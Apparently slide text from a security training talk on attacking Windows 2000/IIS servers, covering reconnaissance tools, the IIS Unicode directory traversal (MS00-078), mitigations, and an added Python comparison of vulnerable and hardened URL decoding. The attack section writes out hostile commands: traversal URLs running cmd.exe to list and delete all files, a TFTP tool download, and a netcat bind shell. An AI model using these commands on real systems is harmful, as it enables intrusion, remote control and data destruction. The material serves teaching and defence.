Expose the Vulnerability
Paul Hogan
Ward Solutions
Session Prerequisites
Hands-on experience with Windows 2000 or Windows Server 2003
Working knowledge of networking, including basics of security
Basic knowledge of network security-assessment strategies
Level 300
Anatomy of a Hack
Information Gathering / Profiling
- nslookup, whois
Probe / Enumerating
- Superscan, nmap, nessus, nikto, banner grabbing, OS fingerprinting
Attack
- Unicode directory traversal
Advancement
Entrenchment
Infiltration/Extraction
nslookup
RIPE Whois
superscan
Simple Command Line Utilities
net view \\172.16.10.5
net use \\172.16.10.5
net use \\172.16.10.5\ipc$ "" /u:""    (null session: the "red button" vulnerability)
net view \\172.16.10.5
nbtstat -A 172.16.10.5
nbtscan -r 172.16.10.0/24
net use \\172.16.10.5\ipc$ "" /u:guest
nmap
nessus
nikto
Overview
Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory Traversal Vulnerability (BugTraq ID 1806; Microsoft Security Bulletin MS00-078)
Operating System: Windows NT 4.0 (+ IIS 4.0) and Windows 2000 (+ IIS 5.0)
Brief Description: A particular type of malformed URL, one in which the "/" or "\" of a "../" sequence is replaced by an overlong UTF-8 encoding such as %c0%af, could be used to access files and directories beyond the web folders, because IIS checked the path for traversal before it had finished decoding the URL. This would potentially enable a malicious user to gain privileges commensurate with those of a locally logged-on user. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it.
Impacts
If the e-business web server is compromised, the backend database server is under threat too: trust relationships, shared passwords and database connection pools all carry over. The web server and database server can then be used as a relay between the outside machine and the internal machines, and the firewall is circumvented.
If the compromised web server is a software distribution site, Trojans or zombie code can be added to the downloadable software, giving the attacker control of every machine that downloads software from that site.
Solutions
Install patches as soon as possible
- Patch Management: SMS/SUS/MBSA
Disable NetBIOS over TCP/IP.
Be sure that the IUSR_machinename account does not have write access to any files on the server.
Unicode Directory Traversal Attack
Run cmd.exe through the traversal (first list, then delete, every file on C:):
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.*
The same thing scripted with unicodexecute.pl: list a directory, fetch tools from a TFTP server at 172.10.10.21 onto the web server, then start a netcat bind shell (cmd.exe on TCP 555) on the web server:
perl -x unicodexecute.pl 172.16.10.5:80 dir
perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.*
perl -x unicodexecute.pl 172.16.10.5:80 nc -L -p 555 -d -e cmd.exe
c:\nc 192.168.1.2 443
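Why the %c0%af payload above gets past the server while a plain ../ does not comes down to the order of two steps: the unpatched IIS ran its path check after a single %xx decoding pass but before the UTF-8 decode that turns the overlong sequence %c0%af into "/". The following Python is an added example, not code from the slides or from Microsoft: a vulnerable resolver that checks and then finishes decoding, beside a hardened one that decodes strictly and then checks the canonical path. The file-system mapping (FS_ROOT, VDIR) and the request paths are constructed for the example.

```python
"""Why %c0%af got past IIS: check-then-decode versus decode-then-check.

Added example (not code from the slides).  The vulnerable resolver imitates the
unpatched order of operations: one %xx decoding pass, a containment check on the
result, and only then a lenient UTF-8 decode that turns the overlong sequence
%c0%af into '/'.  The hardened resolver decodes strictly first and checks the
fully canonical path.  FS_ROOT, VDIR and the request paths are constructed.
"""
import posixpath
from typing import Dict, Optional, Tuple
from urllib.parse import unquote_to_bytes

FS_ROOT = "C:/inetpub"   # assumed: virtual dir /scripts lives at C:/inetpub/scripts
VDIR = "/scripts"


def lenient_utf8(raw: bytes) -> str:
    """UTF-8 decoder that accepts overlong two-byte forms, like the old IIS code.

    110xxxxx 10yyyyyy -> ((b0 & 0x1F) << 6) | (b1 & 0x3F) with no check that the
    code point needed two bytes, so %c0%af -> '/' (0x2F) and %c1%9c -> '\\' (0x5C).
    Other non-ASCII bytes are replaced with U+FFFD.
    """
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def inside_vdir(path: str) -> bool:
    """Resolve '.' and '..' segment by segment; True if the path stays under VDIR."""
    stack = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                return False          # climbed above the site root
            stack.pop()
        else:
            stack.append(seg)
    return stack[:1] == [VDIR.strip("/")]


def vulnerable_resolve(request_path: str) -> Optional[str]:
    """Check first, then finish decoding (the unpatched order)."""
    once = unquote_to_bytes(request_path)             # single %xx pass
    # '..\xc0\xaf..' is just an odd directory name at this point, and the
    # following '..' backs out of it again, so the containment check passes.
    if not inside_vdir(once.decode("latin-1")):
        return None
    decoded = lenient_utf8(once).replace("\\", "/")   # overlong bytes become '/' only now
    return posixpath.normpath(FS_ROOT + decoded)


def hardened_resolve(request_path: str) -> Optional[str]:
    """Finish decoding strictly, then check the canonical path (the fixed order)."""
    once = unquote_to_bytes(request_path)
    try:
        decoded = once.decode("utf-8")                # strict: overlong forms are rejected
    except UnicodeDecodeError:
        return None
    decoded = decoded.replace("\\", "/")
    if not inside_vdir(decoded):
        return None
    canonical = posixpath.normpath(FS_ROOT + decoded)
    vdir_root = FS_ROOT + VDIR
    if canonical != vdir_root and not canonical.startswith(vdir_root + "/"):
        return None                                   # second check on the final path
    return canonical


# Constructed request paths: the slide's %c0%af payload plus the variants it is
# usually compared with.
SAMPLE_REQUESTS = [
    "/scripts/dir.asp",                              # legitimate
    "/scripts/caf%c3%a9.asp",                        # legitimate, valid UTF-8
    "/scripts/../../winnt/system32/cmd.exe",         # plain traversal
    "/scripts/..%2f..%2fwinnt/system32/cmd.exe",     # percent-encoded '/'
    "/scripts/..%c0%af../winnt/system32/cmd.exe",    # overlong '/' (the slide's payload)
    "/scripts/..%c1%9c../winnt/system32/cmd.exe",    # overlong '\\'
]


def compare(requests=SAMPLE_REQUESTS) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Map each request path to (vulnerable result, hardened result)."""
    return {r: (vulnerable_resolve(r), hardened_resolve(r)) for r in requests}


if __name__ == "__main__":
    for req, (vuln, hard) in compare().items():
        print(f"{req:48} vulnerable={str(vuln):32} hardened={hard}")
```

Only the two overlong variants separate the resolvers: the plain and %2f traversals are caught by both, the overlong ones map to C:/winnt/system32/cmd.exe in the vulnerable order and are rejected outright by the strict decoder in the hardened one, and valid UTF-8 such as %c3%a9 still resolves normally. The general lesson is the one the patch applied: canonicalize completely (all decoding passes, both slash forms) before any security decision is made on a path.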
How To Get Your Network Hacked In 10 Easy Steps
1. Don't patch anything
2. Run unhardened applications
3. Logon everywhere as a domain admin
4. Open lots of holes in the firewall
5. Allow unrestricted internal traffic
6. Allow all outbound traffic
7. Don't harden servers
8. Use lame passwords
9. Use high-level service accounts, in multiple places
10. Assume everything is OK
The moral
Initial entry is everything
Most networks are designed like egg shells
Hard and crunchy on the outside
Soft and chewy on the inside
Once an attacker is inside the network you can…
Update resume
Hope he does a good job running it
- Drain the network